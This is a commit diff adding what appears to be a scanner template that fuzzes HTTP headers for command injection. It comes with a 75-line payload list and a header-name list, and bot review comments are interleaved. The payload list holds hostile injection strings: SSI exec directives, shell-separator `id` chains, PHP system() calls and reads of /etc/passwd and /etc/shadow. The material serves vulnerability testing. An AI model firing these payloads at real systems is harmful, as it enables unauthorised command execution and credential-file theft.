commit
9071ed2a2b
|
@ -0,0 +1,35 @@
|
|||
id: header-command-injection
|
||||
|
||||
info:
|
||||
name: Header Command Injection
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: Fuzzing headers for command injection
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
header: helpers/payloads/request-headers.txt
|
||||
payload: helpers/payloads/command-injection.txt
|
||||
|
||||
raw:
|
||||
- |
|
||||
GET /?§header§ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
§header§: §payload§
|
||||
Connection: close
|
||||
|
||||
attack: clusterbomb
|
||||
redirects: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
condition: and
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
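Review bot: The raw request already fixes `Host`, `User-Agent` and `Connection`, yet helpers/payloads/request-headers.txt lists those same names, so the `§header§: §payload§` line sends each of them twice. A duplicated `Host` or a non-numeric `Content-Length` is likely to be rejected by the server or an intermediary before any application code sees it, so those combinations add requests and 400-class noise without testing anything. Either drop the names that the raw block sets from the header list, or record the constraint in the template with a comment such as `# Host, User-Agent and Connection are set below; keep them out of request-headers.txt`. Separately, `attack: clusterbomb` over 33 headers and 75 payloads issues 2,475 requests per target, which is worth stating in `description` so operators can rate-limit and scope the scan. The header name in `GET /?§header§` looks like a per-request tag for correlating logs; a one-line comment would confirm that it is intentional.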
|
|
@ -0,0 +1,75 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;system('cat%20/etc/passwd')
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
||||
$;/usr/bin/id
|
||||
$(`cat /etc/passwd`)
|
||||
cat /etc/passwd
|
||||
%0Acat%20/etc/passwd
|
||||
{{ get_user_file("/etc/passwd") }}
|
||||
<!--#exec cmd="/bin/cat /etc/passwd"-->
|
||||
<!--#exec cmd="/usr/bin/id;-->
|
||||
system('cat /etc/passwd');
|
||||
<?php system("cat /etc/passwd");?>
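Review bot: Several entries in this list can never produce a finding with the template's matchers, which only recognise `id` output or a passwd-style `root:` line. The `netstat -a` and `/bin/ls -al` entries and the `/etc/shadow` read fall outside both, and the shadow entry would also pull password hashes into scan responses and logs if it ever succeeded. Seven lines are exact repeats of earlier ones (`;id;`, `a|id` and `%0Acat%20/etc/passwd` each appear twice, for example). Under the clusterbomb pairing every redundant line costs 33 extra requests per target, so removing the repeats and the unmatched entries shrinks the scan without losing any detection the matchers can report. A header comment is not possible in a plain wordlist, so the provenance of the list and its one-payload-per-line format would be better documented in the template's `description`.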
|
|
@ -0,0 +1,33 @@
|
|||
Accept
|
||||
Accept-Charset
|
||||
Accept-Datetime
|
||||
Accept-Encoding
|
||||
Accept-Language
|
||||
Authorization
|
||||
Cache-Control
|
||||
Connection
|
||||
Content-Length
|
||||
Content-MD5
|
||||
Content-Type
|
||||
Cookie
|
||||
Date
|
||||
Expect
|
||||
Forwarded
|
||||
From
|
||||
Host
|
||||
If-Match
|
||||
If-Modified-Since
|
||||
If-None-Match
|
||||
If-Range
|
||||
If-Unmodified-Since
|
||||
Max-Forwards
|
||||
Origin
|
||||
Pragma
|
||||
Proxy-Authorization
|
||||
Range
|
||||
Referer
|
||||
TE
|
||||
Upgrade
|
||||
User-Agent
|
||||
Via
|
||||
Warning
|